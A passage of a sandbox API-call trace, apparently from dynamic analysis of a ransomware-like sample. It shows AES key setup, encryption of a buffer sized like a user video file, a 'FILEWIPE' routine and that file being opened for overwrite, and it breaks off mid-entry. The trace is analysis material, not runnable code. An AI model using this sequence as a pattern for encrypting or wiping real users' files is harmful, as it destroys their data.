[0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0192.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0192.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0192.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0192.962] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0192.963] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.963] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0192.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.963] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.963] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.963] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.963] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.963] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.963] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.964] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.964] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0192.964] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.964] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1ceb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x1cf0) returned 1 [0192.964] CharLowerBuffW (in: lpsz="byte[7409]", cchLength=0xa | out: lpsz="byte[7409]") returned 0xa [0192.964] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.965] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbea018*, pdwDataLen=0x87e820*=0x1ceb, dwBufLen=0x1cf0 | out: pbData=0xbea018*, pdwDataLen=0x87e820*=0x1cf0) returned 1 [0192.965] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.967] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.968] CryptDestroyKey (hKey=0x90af98) returned 1 [0192.996] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.996] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.997] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.997] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.998] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0192.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.998] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0193.000] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0193.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0193.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0193.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc22a3ef0, ftCreationTime.dwHighDateTime=0x1d5e70c, ftLastAccessTime.dwLowDateTime=0xa9d8a260, ftLastAccessTime.dwHighDateTime=0x1d5daaa, ftLastWriteTime.dwLowDateTime=0xa9d8a260, ftLastWriteTime.dwHighDateTime=0x1d5daaa, nFileSizeHigh=0x0, nFileSizeLow=0x1ceb, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cWKRu.avi", cAlternateFileName="")) returned 0x90af58 [0193.000] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0193.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0193.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0193.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0193.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0193.001] CharLowerBuffW (in: lpsz="byte[7403]", cchLength=0xa | out: lpsz="byte[7403]") returned 0xa [0193.001] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0193.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0193.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0193.001] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0193.001] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0193.001] FreeLibrary (hLibModule=0x75c90000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0193.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.003] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0193.003] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0193.003] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cwkru.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0193.003] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.004] HeapFree 